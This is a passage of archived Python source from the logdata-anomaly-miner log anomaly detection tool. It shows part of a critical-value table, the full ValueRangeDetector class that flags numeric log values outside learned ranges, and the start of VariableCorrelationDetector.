0.37471304310660425, 'beta1': 0.18583949748603418, 'beta2': 0.6021024278440756, 'beta4': [0.05749272265644228, 1.043381326439097]}, 10: {'uni': 0.527570467729745, 'beta1': 0.3603215508845803, 'beta2': 0.7131220771053172, 'beta4': [0.08533707841915919, 1.0350030516769588]}}, 150: {1000: {'uni': 0.07052889039205126, 'beta1': 0.010024200840333964, 'beta2': 0.3083261123837317, 'beta4': [0.013526285671768778, 1.2478637545541533]}, 750: {'uni': 0.0860726015615848, 'beta1': 0.010380529900627569, 'beta2': 0.30599740090325434, 'beta4': [0.012540685650418876, 1.2286531319506213]}, 500: {'uni': 0.0654006630277639, 'beta1': 0.008681664379906905, 'beta2': 0.45441420543986255, 'beta4': [0.011738965264343941, 1.2046107993328228]}, 400: {'uni': 0.07018607099380372, 'beta1': 0.020538750971438955, 'beta2': 0.3401951193202403, 'beta4': [0.010482953670016155, 1.1967410973771544]}, 300: {'uni': 0.07906994258517838, 'beta1': 0.012765196487756798, 'beta2': 0.3473319166630782, 'beta4': [0.012960970621760944, 1.186784276574822]}, 200: {'uni': 0.07687044506402128, 'beta1': 0.009009790251886841, 'beta2': 0.390321852263401, 'beta4': [0.016054629934173753, 1.1614077237409302]}, 150: {'uni': 0.08234029556315943, 'beta1': 0.014170771965552609, 'beta2': 0.32568694785066254, 'beta4': [0.011742895360485154, 1.1450709824504766]}, 100: {'uni': 0.09851302012310224, 'beta1': 0.016743774531242164, 'beta2': 0.3769412320128021, 'beta4': [0.01637186145008221, 1.1181403582578833]}, 75: {'uni': 0.13159671189369468, 'beta1': 0.0353072844153596, 'beta2': 0.4029701798442491, 'beta4': [0.0242920289946626, 1.1014964463557084]}, 50: {'uni': 0.2082524484431105, 'beta1': 0.058731656498910045, 'beta2': 0.4381324547033927, 'beta4': [0.026849081958434176, 1.0876033182011025]}, 30: {'uni': 0.293617651791125, 'beta1': 0.09264315880887661, 'beta2': 0.5127477095369036, 'beta4': [0.03992448279709234, 1.0738220472794529]}, 20: {'uni': 0.36087329714400185, 'beta1': 0.20900980183336224, 'beta2': 0.5807926264924211, 'beta4': 
[0.05187077347058253, 1.0620763444007149]}, 10: {'uni': 0.5219501641374265, 'beta1': 0.3551980104060056, 'beta2': 0.7076947393664232, 'beta4': [0.08767917650288747, 1.0483637472236114]}}, 100: {1000: {'uni': 0.09293632608491963, 'beta1': 0.025720520021528075, 'beta2': 0.40252090475367147, 'beta4': [0.020928371822775547, 1.34296320538308]}, 750: {'uni': 0.10604279254769028, 'beta1': 0.03092454484113119, 'beta2': 0.3818717550561334, 'beta4': [0.02453933202150238, 1.342042471316131]}, 500: {'uni': 0.12565818508622995, 'beta1': 0.022377522080934454, 'beta2': 0.3905279161507944, 'beta4': [0.019542928350261425, 1.3078129134604686]}, 400: {'uni': 0.10873296749252183, 'beta1': 0.021194077173698013, 'beta2': 0.40756034730854335, 'beta4': [0.02718956918208252, 1.2942385171370212]}, 300: {'uni': 0.15669346437026238, 'beta1': 0.03142712087537317, 'beta2': 0.43179943146892075, 'beta4': [0.02064917213006419, 1.2667039670988918]}, 200: {'uni': 0.13343635754779815, 'beta1': 0.024233682548692133, 'beta2': 0.41522565490064955, 'beta4': [0.022369515030967926, 1.229891305593201]}, 150: {'uni': 0.11102480689661139, 'beta1': 0.02156285575115978, 'beta2': 0.45645114687990723, 'beta4': [0.01753545868173576, 1.2201162525672415]}, 100: {'uni': 0.11113330260703609, 'beta1': 0.025608870599415502, 'beta2': 0.48352061272931374, 'beta4': [0.020850521302083376, 1.1960117094042504]}, 75: {'uni': 0.1468788764521182, 'beta1': 0.0265797908677119, 'beta2': 0.5095270313141985, 'beta4': [0.021404540631677776, 1.1660210148862071]}, 50: {'uni': 0.21504666655802165, 'beta1': 0.0489536361147554, 'beta2': 0.45594457855380627, 'beta4': [0.027095564600229022, 1.145224577518587]}, 30: {'uni': 0.28088203482754814, 'beta1': 0.10794487397895774, 'beta2': 0.5169455155470948, 'beta4': [0.042544039097420154, 1.1110310777960173]}, 20: {'uni': 0.3554362219541707, 'beta1': 0.14189026695845378, 'beta2': 0.5830537392316464, 'beta4': [0.056849867105273504, 1.0955705395949151]}, 10: {'uni': 0.5379842252559748, 'beta1': 
0.3322804773023954, 'beta2': 0.6932018848300567, 'beta4': [0.08316172640718857, 1.0796082756736676]}}, 75: {1000: {'uni': 0.17532266769625532, 'beta1': 0.03705383020682054, 'beta2': 0.4980809003523, 'beta4': [0.026908987077822855, 1.479626079300446]}, 750: {'uni': 0.17675406910394137, 'beta1': 0.038950169506359156, 'beta2': 0.5358765381219652, 'beta4': [0.029789208608383192, 1.4458845611717743]}, 500: {'uni': 0.1745341229104289, 'beta1': 0.03502152451732104, 'beta2': 0.5015222005427495, 'beta4': [0.02661668897015479, 1.4148626116690979]}, 400: {'uni': 0.1881709766845352, 'beta1': 0.03266767818661956, 'beta2': 0.5294529369416701, 'beta4': [0.02895499025416707, 1.3854046773623654]}, 300: {'uni': 0.13841231000540105, 'beta1': 0.040099804822498177, 'beta2': 0.4996511962838116, 'beta4': [0.026756867634909184, 1.3802282341024599]}, 200: {'uni': 0.2366476167578417, 'beta1': 0.03552681627168437, 'beta2': 0.5607067863598236, 'beta4': [0.03323654149531536, 1.2735668785729228]}, 150: {'uni': 0.18246201015916463, 'beta1': 0.03018835273992427, 'beta2': 0.5001788380781702, 'beta4': [0.025060717431827743, 1.2546678580100472]}, 100: {'uni': 0.15047393862146116, 'beta1': 0.04053535855173776, 'beta2': 0.4812632826392785, 'beta4': [0.026154101723556197, 1.2327049090106668]}, 75: {'uni': 0.15012891413727075, 'beta1': 0.02909973108408468, 'beta2': 0.49374882961313393, 'beta4': [0.02312183625600833, 1.2116456107592724]}, 50: {'uni': 0.19863871412617307, 'beta1': 0.06609371552014234, 'beta2': 0.6567166295934954, 'beta4': [0.03296979599917632, 1.2550373634574192]}, 30: {'uni': 0.2550047584775841, 'beta1': 0.11172494481560213, 'beta2': 0.5074928992715775, 'beta4': [0.043521196438275414, 1.1350283218684674]}, 20: {'uni': 0.35838253867057834, 'beta1': 0.16187358221610643, 'beta2': 0.5897253293496353, 'beta4': [0.05534786787218656, 1.1279915725089584]}, 10: {'uni': 0.5150122800236072, 'beta1': 0.3557051324372316, 'beta2': 0.6880298753534303, 'beta4': [0.09054643254841971, 
1.103946091144453]}}, 50: {1000: {'uni': 0.2650056267046456, 'beta1': 0.08166412797304853, 'beta2': 0.5945214491866839, 'beta4': [0.04097953842977647, 1.8013173549302084]}, 750: {'uni': 0.24155189502911895, 'beta1': 0.10245354397196359, 'beta2': 0.6330919397034261, 'beta4': [0.034894476175374486, 1.650125217907123]}, 500: {'uni': 0.22696308147232963, 'beta1': 0.0679737190879648, 'beta2': 0.6138878557879524, 'beta4': [0.03566096720674545, 1.6223000589486727]}, 400: {'uni': 0.33396981679697424, 'beta1': 0.0706793112232333, 'beta2': 0.7113457702884565, 'beta4': [0.03723609953854181, 1.515912197850878]}, 300: {'uni': 0.2294437752492345, 'beta1': 0.10300859222087975, 'beta2': 0.624203244880632, 'beta4': [0.03555120916901846, 1.4723487637131012]}, 200: {'uni': 0.23606764222426072, 'beta1': 0.0596235427426007, 'beta2': 0.6485710881348021, 'beta4': [0.03546895329039058, 1.4690637171977303]}, 150: {'uni': 0.24971083019799395, 'beta1': 0.08173419251816907, 'beta2': 0.6412527594047174, 'beta4': [0.03080052698601413, 1.400646947726267]}, 100: {'uni': 0.24073055018989464, 'beta1': 0.08393118651040495, 'beta2': 0.6318891921522501, 'beta4': [0.033365155212361386, 1.3928918785590392]}, 75: {'uni': 0.20486837629924928, 'beta1': 0.07832186899428449, 'beta2': 0.9281761107775478, 'beta4': [0.035445164112972466, 1.359740664152222]}, 50: {'uni': 0.31302104786432344, 'beta1': 0.06958866399568142, 'beta2': 0.6675066174467515, 'beta4': [0.04004874980800829, 1.3013016016398449]}, 30: {'uni': 0.3000620157287262, 'beta1': 0.10185267251225222, 'beta2': 0.5982970610321356, 'beta4': [0.04582850492651095, 1.2269146691004775]}, 20: {'uni': 0.3277234906176977, 'beta1': 0.17678051119760746, 'beta2': 0.80877510160582, 'beta4': [0.055374219831087326, 1.182345614556768]}, 10: {'uni': 0.5486887840452432, 'beta1': 0.33752085706590534, 'beta2': 0.9783712560936997, 'beta4': [0.08769564811462487, 1.1728320174796847]}}, 30: {1000: {'uni': 0.4718938205689787, 'beta1': 0.16850220491415746, 'beta2': 
0.8146723863376911, 'beta4': [0.060273300232967286, 2.0988712699699263]}, 750: {'uni': 0.5018440993649246, 'beta1': 0.17087313652020972, 'beta2': 0.9139854538013207, 'beta4': [0.06558390958546415, 1.9685729528057976]}, 500: {'uni': 0.4550074651154489, 'beta1': 0.28720847796868054, 'beta2': 0.9452586563341621, 'beta4': [0.05890745674834778, 1.8754248251081465]}, 400: {'uni': 0.436712873445179, 'beta1': 0.19309724802712522, 'beta2': 0.8305072281593623, 'beta4': [0.07639496690376428, 1.8192427800816744]}, 300: {'uni': 0.4038782023707537, 'beta1': 0.21954095996677023, 'beta2': 1.0495495612649217, 'beta4': [0.086287115068548, 1.8253687511907974]}, 200: {'uni': 0.40958440685368225, 'beta1': 0.2777249767350044, 'beta2': 0.8707654031176021, 'beta4': [0.05316017846802162, 1.9337123485717123]}, 150: {'uni': 0.48726972984551553, 'beta1': 0.2808145117204757, 'beta2': 0.7712993996707392, 'beta4': [0.06855307088907785, 1.6668462866585527]}, 100: {'uni': 0.4200145205606179, 'beta1': 0.2606601028231352, 'beta2': 0.9232966743931794, 'beta4': [0.05814323640662995, 1.6078579676603513]}, 75: {'uni': 0.39519545172731607, 'beta1': 0.22617403736893438, 'beta2': 0.890799391826426, 'beta4': [0.054127227539886885, 1.560768803789716]}, 50: {'uni': 0.39025281852797566, 'beta1': 0.23363888472905656, 'beta2': 1.2303662537657782, 'beta4': [0.06300398028876605, 1.4559351506605223]}, 30: {'uni': 0.44358611593337394, 'beta1': 0.26124311609935197, 'beta2': 0.9784487439751727, 'beta4': [0.06612661331709933, 1.392222289383322]}, 20: {'uni': 0.5347291476681059, 'beta1': 0.27747940739842103, 'beta2': 0.9266746270833626, 'beta4': [0.06610539815659515, 1.32312648428402]}, 10: {'uni': 0.5268518049779942, 'beta1': 0.3857529731825581, 'beta2': 1.1001485562440783, 'beta4': [0.08788647848700928, 1.2844856774978703]}}, 20: {1000: {'uni': 0.611616820756745, 'beta1': 0.6103466151158652, 'beta2': 1.606833963804752, 'beta4': [0.09884033613550786, 2.1456400777366262]}, 750: {'uni': 0.8441808990110113, 'beta1': 
0.655796713372086, 'beta2': 1.3506490733719665, 'beta4': [0.08853624853950347, 2.43866677610598]}, 500: {'uni': 0.5988373577646251, 'beta1': 0.46186085630032825, 'beta2': 1.1443828909845946, 'beta4': [0.0898461305276427, 2.2698199759166293]}, 400: {'uni': 0.8304510322484031, 'beta1': 0.5653414175451948, 'beta2': 1.0996186027703847, 'beta4': [0.08571539158958671, 3.387955591663139]}, 300: {'uni': 0.7442187522594172, 'beta1': 0.46331401253974935, 'beta2': 1.3717790709655808, 'beta4': [0.08555870911414092, 2.2166475986530325]}, 200: {'uni': 0.5840315022363041, 'beta1': 0.500364751905612, 'beta2': 1.4769988218033934, 'beta4': [0.08329354644891862, 2.1254438240050932]}, 150: {'uni': 0.7370906650368898, 'beta1': 0.4300463168971484, 'beta2': 1.3485978764788007, 'beta4': [0.09303457801455614, 2.2267612097524974]}, 100: {'uni': 0.6956826951091755, 'beta1': 0.5470576578153282, 'beta2': 1.2950746340437869, 'beta4': [0.085475813042166, 2.138973908107944]}, 75: {'uni': 0.6315552620464701, 'beta1': 0.45366873570471705, 'beta2': 1.1868079151662958, 'beta4': [0.08610644280569565, 2.003073434601368]}, 50: {'uni': 0.7697854387023668, 'beta1': 0.6507738597857059, 'beta2': 1.2659839239789354, 'beta4': [0.1046390254645072, 1.8724398846396764]}, 30: {'uni': 0.6306465749354568, 'beta1': 0.3466779009755018, 'beta2': 1.4822578201869108, 'beta4': [0.07745622301179714, 1.657048978669253]}, 20: {'uni': 0.8379018121518431, 'beta1': 0.4723776520325354, 'beta2': 1.2850268089384693, 'beta4': [0.08284590089109896, 1.6388492255583167]}, 10: {'uni': 0.8026106812614728, 'beta1': 0.8119190556003473, 'beta2': 1.2439818501783644, 'beta4': [0.085265760399476, 1.5405846754306889]}}, 10: {1000: {'uni': 2.3606969805461206, 'beta1': 8.291393251934911, 'beta2': 3.0820553912299253, 'beta4': [0.17737760558981158, 4.722276247639879]}, 750: {'uni': 2.6243276289156463, 'beta1': 2.7438030102193163, 'beta2': 3.9683799500049672, 'beta4': [0.17895578288402622, 4.083319167546689]}, 500: {'uni': 3.0871922423026548, 
'beta1': 3.0328915004201407, 'beta2': 2.4964791662617336, 'beta4': [0.18355309506899545, 4.031756561717203]}, 400: {'uni': 1.6754252980305366, 'beta1': 2.924592003149563, 'beta2': 2.876497968109593, 'beta4': [0.20379870214850968, 4.7571034917708745]}, 300: {'uni': 2.2840468336952258, 'beta1': 2.5053743801906627, 'beta2': 2.783976562174647, 'beta4': [0.1674565791702932, 4.251642426694717]}, 200: {'uni': 1.9404428681304904, 'beta1': 2.5953221685871517, 'beta2': 2.7845173800545835, 'beta4': [0.18871911293484883, 3.741857968949452]}, 150: {'uni': 2.2704248546155794, 'beta1': 2.5329844830991, 'beta2': 2.9321247060942506, 'beta4': [0.19544767471408223, 4.336291651767806]}, 100: {'uni': 1.7356265048063002, 'beta1': 2.688039772684837, 'beta2': 4.461312176712382, 'beta4': [0.2144202268455395, 3.7766159615531025]}, 75: {'uni': 2.801004734921743, 'beta1': 2.464893798760152, 'beta2': 3.0067071540322545, 'beta4': [0.15188724806910345, 3.526991789646563]}, 50: {'uni': 2.0977009172862875, 'beta1': 2.7445624040074015, 'beta2': 2.765481175145812, 'beta4': [0.18755095945550393, 3.344866076834204]}, 30: {'uni': 2.880255284937104, 'beta1': 3.0321147833640745, 'beta2': 2.8449557765079883, 'beta4': [0.17623333533835164, 2.790174609633874]}, 20: {'uni': 1.9749893632036886, 'beta1': 2.776680410526643, 'beta2': 2.333479763453262, 'beta4': [0.17125301578097318, 2.713705409440226]}, 10: {'uni': 1.769735529651201, 'beta1': 2.0654589693702543, 'beta2': 2.084703780638172, 'beta4': [0.1690462952550446, 2.275840335334111]}}}} # noqa: E501, E231 crit_val_hom_cm = {0.05: {1000: {1000: 250.45790499999998, 750: 214.76505847619046, 500: 167.13765355555554, 400: 143.34140714285715, 300: 115.84368512820512, 200: 83.78856944444445, 150: 65.64008811594204, 100: 45.92995272727273, 75: 35.333255503875975, 50: 24.20186603174603, 30: 15.071306472491909, 20: 10.300656209150326, 10: 5.412521782178217}, 750: {750: 187.94798666666668, 500: 150.45562666666666, 400: 130.8715215942029, 300: 107.59431746031746, 200: 
79.42039298245614, 150: 62.92309481481481, 100: 44.59799294117647, 75: 34.55483636363636, 50: 23.878958333333333, 30: 14.859858119658119, 20: 10.21919393939394, 10: 5.402328070175439}, 500: {500: 125.503068, 400: 111.5444314814815, 300: 94.26128, 200: 71.8865042857143, 150: 58.17430564102565, 100: 42.119102222222224, 75: 33.121080579710146, 50: 23.146869090909092, 30: 14.620633962264153, 20: 10.067361538461538, 10: 5.362602614379085}, 400: {400: 100.46720625, 300: 86.17663333333333, 200: 67.12748888888889, 150: 55.01036818181819, 100: 40.436935, 75: 32.00267719298246, 50: 22.691451851851852, 30: 14.409891472868217, 20: 9.963246031746031, 10: 5.314048780487806}, 300: {300: 75.4713888888889, 200: 60.46678, 150: 50.42997037037037, 100: 37.9633, 75: 30.453804444444447, 50: 21.899904761904764, 30: 14.075888888888887, 20: 9.838104166666666, 10: 5.271225806451613}, 200: {200: 50.458725, 150: 43.26386190476191, 100: 33.81099444444445, 75: 27.704703030303033, 50: 20.47892, 30: 13.505202898550726, 20: 9.538204545454546, 10: 5.192849206349207}, 150: {150: 37.93966666666667, 100: 30.43725333333333, 75: 25.45431111111111, 50: 19.195833333333333, 30: 12.965740740740742, 20: 9.288392156862745, 10: 5.1022083333333335}, 100: {100: 25.4654, 75: 21.866933333333332, 50: 17.144955555555555, 30: 12.011923076923077, 20: 8.791944444444445, 10: 5.000454545454545}, 75: {75: 19.179288888888887, 50: 15.485066666666667, 30: 11.208, 20: 8.371368421052633, 10: 4.864470588235294}, 50: {50: 13.005400000000002, 30: 9.881416666666667, 20: 7.576285714285715, 10: 4.6065555555555555}, 30: {30: 7.982777777777779, 20: 6.457666666666666, 10: 4.179166666666666}, 20: {20: 5.442500000000001, 10: 3.7661111111111114}, 10: {10: 2.925}}} # noqa: E501, E231 crit_val_dw = {0.01: {1000: 1.855, 750: 1.833, 500: 1.797, 400: 1.773, 300: 1.739, 200: 1.684, 150: 1.637, 100: 1.562, 75: 1.501, 50: 1.403, 30: 1.264, 20: 1.147, 10: 1.001}, 0.05: {1000: 1.898, 750: 1.883, 500: 1.857, 400: 1.841, 300: 1.817, 200: 1.779, 150: 
1.747, 100: 1.694, 75: 1.652, 50: 1.585, 30: 1.489, 20: 1.411, 10: 1.320}} # noqa: E501, E231
ValueRangeDetector.py000066400000000000000000000321731500476301700350520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines a detector for numeric value ranges.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import os
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME, \
    CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class ValueRangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """This class creates events when numeric values are outside learned intervals.

    For every identifier (the tuple of values found at id_path_list) the detector keeps the smallest and largest value seen at
    target_path_list in self.ranges["min"] / self.ranges["max"]. While learn_mode is active a value outside the known interval still
    raises an event, but the interval is then widened to include it. The learned intervals are the only state written to the
    persistence file, so that file is the detector's baseline: whatever is stored there is accepted as the learned ranges on the
    next start without further validation.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, persistence_id="Default",
                 learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param id_path_list to specify group identifiers for which numeric ranges should be learned.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are
               considered for value range generation.
        @param persistence_id name of persistence document.
        @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
               omitted.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list list of resource names; atoms whose source.resource_name equals one of them are skipped
               before any counting or analysis takes place.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        # Set on the first received atom: the relative stop_learning_* offsets are turned into an absolute atom_time there.
        self.stop_learning_time_initialized = None
        super().__init__(
            mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"],
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list,
            target_path_list=target_path_list, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline,
            ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list
        )
        # In-memory state: {"min": {id_event: smallest value}, "max": {id_event: largest value}}, keyed by the tuple of id values.
        # NOTE(review): an older comment described the persisted layout as [["min", ...], ["max", ...]]; what PersistenceUtil
        # actually writes (and how tuple keys survive the JSON round trip) is not visible here -- verify against PersistenceUtil.
        self.ranges = {"min": {}, "max": {}}
        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def load_persistence_data(self) -> None:
        """Load the persistence data from storage.

        Whatever the persistence file contains replaces self.ranges as a whole; nothing is checked here, so the file's integrity
        (write access limited to the aminer user) is what protects the learned baseline from being tampered with.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            self.ranges = persistence_data

    def receive_atom(self, log_atom) -> None:
        """Receive a log atom from a source.

        Steps: skip ignored resources, maintain the learning deadline, apply ignore_list/constraint_list, collect the values at
        target_path_list and the identifier at id_path_list, report values outside the known interval, and widen the interval
        when learn_mode is active. Atoms from ignored resources are not counted in log_total.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name == source:
                return
        self.log_total += 1
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            # The configured values are offsets; anchor them to the first atom's timestamp.
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        parser_match = log_atom.parser_match
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip atom when ignore paths in atom or constraint paths not in atom.
        all_paths_set = set(parser_match.get_match_dictionary().keys())
        if len(all_paths_set.intersection(self.ignore_list)) > 0 or \
                len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list):
            return

        # Store all values from target target_path_list in a list.
        values = []
        all_values_none = True
        for path in self.target_path_list:
            match = parser_match.get_match_dictionary().get(path)
            if match is None:
                continue
            matches = []
            if isinstance(match, list):
                matches = match
            else:
                matches.append(match)
            for match in matches:
                value = match.match_object
                # NOTE(review): the original file's indentation was lost in this copy; the append is read here as belonging to the
                # None check, which keeps None out of the min()/max() calls below -- confirm against the upstream file.
                if value is not None:
                    all_values_none = False
                    values.append(value)
        if all_values_none is True:
            return

        # Store all values from id paths in a list. Use empty list as default path if not applicable.
        id_vals = []
        for path in self.id_path_list:
            match = parser_match.get_match_dictionary().get(path)
            if match is None:
                continue
            matches = []
            if isinstance(match, list):
                matches = match
            else:
                matches.append(match)
            for match in matches:
                # Identifiers are normalised to str so that bytes and non-bytes matches produce the same dictionary key.
                if isinstance(match.match_object, bytes):
                    value = match.match_object.decode(AminerConfig.ENCODING)
                else:
                    value = str(match.match_object)
                id_vals.append(value)
        id_event = tuple(id_vals)

        # Check if one of the values is outside expected value ranges for a specific id path.
        # Unknown identifiers never raise an event; they only get a range when learn_mode is active (see below).
        # min()/max() presume the collected values are mutually comparable (numeric) -- a mixed-type target_path_list would raise
        # a TypeError here.
        if id_event in self.ranges["min"] and (min(values) < self.ranges["min"][id_event] or max(values) > self.ranges["max"][id_event]):
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                # Fall back to a Python-escaped representation so undecodable input is still reported verbatim and safely.
                data = repr(log_atom.raw_data)
            if self.output_logline:
                original_log_line_prefix = self.aminer_config.config_properties.get(
                    CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [data]
            analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": values,
                                  "Range": [self.ranges["min"][id_event], self.ranges["max"][id_event]],
                                  "IDpaths": self.id_path_list, "IDvalues": list(id_event)}
            event_data = {"AnalysisComponent": analysis_component}
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f"Analysis.{self.__class__.__name__}", "Value range anomaly detected", sorted_log_lines,
                                       event_data, log_atom, self)

        # Extend ranges if learn mode is active.
        # Note that an out-of-range value is reported above and then absorbed into the interval here, so while learning every
        # outlier widens the baseline; stop_learning_* bounds how long that window stays open.
        if self.learn_mode is True:
            if id_event in self.ranges["min"]:
                self.ranges["min"][id_event] = min(self.ranges["min"][id_event], min(values))
            else:
                self.ranges["min"][id_event] = min(values)
            if id_event in self.ranges["max"]:
                self.ranges["max"][id_event] = max(self.ranges["max"][id_event], max(values))
            else:
                self.ranges["max"][id_event] = max(values)
            if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                # Every processed atom pushes the no-anomaly deadline further out.
                self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the current time handed in by the timer.
        @return number of seconds until this method should be called again.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self) -> None:
        """Immediately write persistence data to storage.

        Only self.ranges is stored; changes made through allowlist_event/blocklist_event live in memory only.
        """
        PersistenceUtil.store_json(self.persistence_file_name, self.ranges)
        logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data) -> str:
        """Allowlist an event generated by this source using the information emitted when generating the event.

        event_data is treated as a parser path: it is added to constraint_list and removed from ignore_list.
        NOTE(review): receive_atom emits a dict as event_data, so callers of this method are expected to pass a path instead --
        confirm what the calling side hands in. The list changes are not persisted (see do_persist).
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        if event_data in self.ignore_list:
            self.ignore_list.remove(event_data)
        return f"Allowlisted path {event_data}."

    def blocklist_event(self, event_type, event_data, blocklisting_data) -> str:
        """Blocklist an event generated by this source using the information emitted when generating the event.

        Mirror image of allowlist_event: event_data is added to ignore_list and removed from constraint_list, in memory only.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = "Blocklisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        if event_data in self.constraint_list:
            self.constraint_list.remove(event_data)
        return f"Blocklisted path {event_data}."

    def log_statistics(self, component_name: str) -> None:
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        Both statistics levels currently print the same line; the counters are reset afterwards either way.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success,
                self.log_total)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success,
                self.log_total)
        self.log_success = 0
        self.log_total = 0
VariableCorrelationDetector.py000066400000000000000000003516341500476301700367540ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for correlations between discrete variables.""" import numpy as np import logging import sys import math from scipy.stats import chi2 from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class first finds for each eventType a list of pairs of variables, which are afterwards tested if they are correlated. For this a couple of preselection methods can be used. (See self.used_presel_meth) Thereafter the correlations are 